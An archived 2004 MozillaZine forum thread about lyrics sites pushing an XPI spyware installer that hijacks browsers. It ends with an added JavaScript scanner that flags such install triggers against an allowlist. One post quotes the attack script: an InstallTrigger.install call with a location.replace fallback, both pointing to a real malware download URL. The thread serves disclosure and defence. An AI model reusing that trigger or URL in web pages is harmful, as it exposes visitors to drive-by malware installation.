We got another XPISpyware
47 posts • Page 1 of 4 • 1, 2, 3, 4
April 3rd, 2004, 9:53 am
http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm
It's there all right. I could only get it to pop up once, but after digging through the source, it's in an external js file. It grabs the XPI from: http://www2.flingstone.com/cab/sbc_netscape.xpi You can find the code in the 4th external script call, the one with all the characters. I would just paste it here but I don't know the legality of pasting their code.
Mindjunk
I didn't hear no bell...
April 3rd, 2004, 10:47 am
I poked around xpi a bit. Here's the summary:
The XPI contains sbc_netscape.exe; it installs a program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net
April 3rd, 2004, 11:24 am
Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T
April 3rd, 2004, 11:34 am
see my proposed answer here
http://forums.mozillazine.org/viewtopic ... 828#463828
April 3rd, 2004, 2:01 pm
Here is what bridge is
http://www.kephyr.com/spywarescanner/li ... ndex.phtml
Mindjunk
I didn't hear no bell...
April 3rd, 2004, 6:06 pm
unless someone blindly changes the xpinstall.* defaults, it's not a problem.
April 3rd, 2004, 7:27 pm
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
April 3rd, 2004, 7:38 pm
iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
Office XP Menus (http://users.bigpond.net.au/nexx1/oxpmenu/) || Unofficial Firefox Branding (http://scragz.com/tech/mozilla/firefox-unofficial-branding.php)
April 3rd, 2004, 9:27 pm
I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... at least enough to know that they need to turn that option on. What I am concerned about is the newb user who, the first time they see that popup, is on a spywared site and won't know what to do; they may just press install. Try to remember that most people won't know what extensions are or even use them once fx starts getting mass deployment; everyone here uses extensions but we aren't average users.
Mindjunk
I didn't hear no bell...
April 3rd, 2004, 10:48 pm
I'd like to see a message box like AnonEmoose suggested, something along the lines of...
"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."
...with the 'critical' icon on the prompt.
Shelumi`El Jordan S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman
April 4th, 2004, 4:15 pm
Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develop; very few MS drivers are signed by MS, so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...
Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373
April 4th, 2004, 5:24 pm
I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman
Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi
Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...
We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531
...and possibly support/contribute anti-spyware solutions to their project in the form of a SpyBot plugin/extension. I made a similar comment on a Moz related blog recently, that may interest you.
Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml
April 5th, 2004, 7:49 am
Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...
April 5th, 2004, 8:15 am
I'm using the 20040403 build and it still tries to install.. :/ there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..
April 5th, 2004, 9:01 am
Aye, it's an external script. It tries
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi'); }
and I am using the newest build and it's still happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...
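The two-step pattern quoted in the post above (an InstallTrigger.install call, then a location.replace fallback to the same .xpi) can be flagged by statically scanning a page's scripts and checking each install target against a host allowlist, as the whitelist suggestions in this thread propose. This is an added example, not part of the original thread; ALLOWED_HOSTS, the page URLs and the if/else wrapper around the sample are assumptions made for illustration.

```javascript
// Hypothetical allowlist of hosts permitted to offer XPI installs.
const ALLOWED_HOSTS = new Set(["addons.example.org"]);

// Constructed sample: the two calls are the ones quoted in the post,
// the if/else around them is an assumed reconstruction.
const SAMPLE = [
  "if (window.InstallTrigger) {",
  "  InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});",
  "} else {",
  "  location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');",
  "}",
].join("\n");

// Find every quoted URL ending in .xpi and classify how the script reaches it.
function findXpiTriggers(scriptText, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  const urlRe = /(['"])([^'"\s]+\.xpi(?:\?[^'"]*)?)\1/gi;
  let m;
  while ((m = urlRe.exec(scriptText)) !== null) {
    // Inspect the text just before the URL to identify the call site.
    const before = scriptText.slice(Math.max(0, m.index - 120), m.index);
    let via = "other";
    if (/InstallTrigger\s*\.\s*install(?:Chrome)?\s*\([^)]*$/.test(before)) {
      via = "InstallTrigger.install";
    } else if (/location\s*\.\s*(?:replace|assign)\s*\(\s*$/.test(before) ||
               /location(?:\.href)?\s*=\s*$/.test(before)) {
      via = "navigation";
    }
    let host = null;
    try {
      host = new URL(m[2], pageUrl).hostname; // resolves relative URLs too
    } catch (e) {
      host = null; // unparsable target: treated as cross-site and not allowed
    }
    findings.push({
      url: m[2],
      host,
      via,
      crossSite: host !== pageHost,
      allowed: host !== null && ALLOWED_HOSTS.has(host),
    });
  }
  return findings;
}

// Report the findings for the constructed sample when run directly.
console.log(findXpiTriggers(SAMPLE, "http://lyrics.example/song.htm"));
```

The scan only sees literal URLs, so an encoded script like the one described in the first post has to be decoded before it is passed in.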